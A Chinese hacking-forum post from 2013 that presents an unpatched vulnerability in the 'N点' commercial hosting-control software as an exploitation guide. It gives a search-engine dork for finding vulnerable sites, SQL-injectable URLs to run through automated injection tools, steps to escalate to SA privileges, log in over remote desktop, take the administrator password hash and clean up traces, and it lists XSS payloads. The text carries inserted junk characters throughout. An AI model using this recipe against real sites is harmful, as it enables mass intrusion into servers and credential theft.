找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2299|回复: 0
打印 上一主题 下一主题

N点商业版漏洞通杀0day以及利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-3 08:06:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
不得不说N点实在是一个破东西
3 Y: v" o$ Q  T8 M# \. v) D( |% F就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
# L. v# S4 |7 ?- t: n好吧 抱怨一下就行了  接下来关键的时候到了$ O5 ~8 q6 B5 Y( T
首先百度搜索关键字:inurl: (mmdatabase.asp)
$ T& `6 b" A  |我随便列举一个:   www.xxxx.com1 ^# y& L' I% g9 Z" j5 u% c
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=19 `3 }9 ~, b: l, z$ e4 a/ ~
扔入NBSI 或者啊D等各种傻逼工具后
6 T. W& T- t& s4 ~7 ^你们会看到是SA权限
, c' N- T, Y, w& ?0 l- k果断3389 上去  hash得到administrator密码
0 `5 P5 v& ~, A- p  L& g/ v" A& h擦屁股走人~
& v; X+ V: w$ x0 C6 ]8 q+ K6 H经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
  M' Q. n4 E. [7 t- a
3 E- J1 o) Z& T2 S8 ^9 b' ?: m7 e再附上其他几个漏洞页面7 S8 {8 K& N+ _4 Y' m
SQL:
% x. _8 B4 N5 Q) e( phttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1; S7 c* _% V# k; [
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
, |: l$ Y! a' b& I& Ihttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
5 a5 S* @) t  x2 p2 `) u/ [http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
" o6 c( U. R' X3 AXSS证明:2 V% K8 f5 ]  K  j& }, A
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
" D; [1 i- ]: O2 r% }5 phttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”# m! p, _  l0 R5 b
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
1 {1 a+ j; e2 {6 j" r8 U* b由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
( j: r" f5 g9 m3 J# m7 G还是星外吧  你们懂的, O$ }+ ^1 h* S  V, t8 P; Q
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
9 c; \1 M! X" ~" p7 l; hPS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉
6 ~1 U$ Y' S. R% s: @——-
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表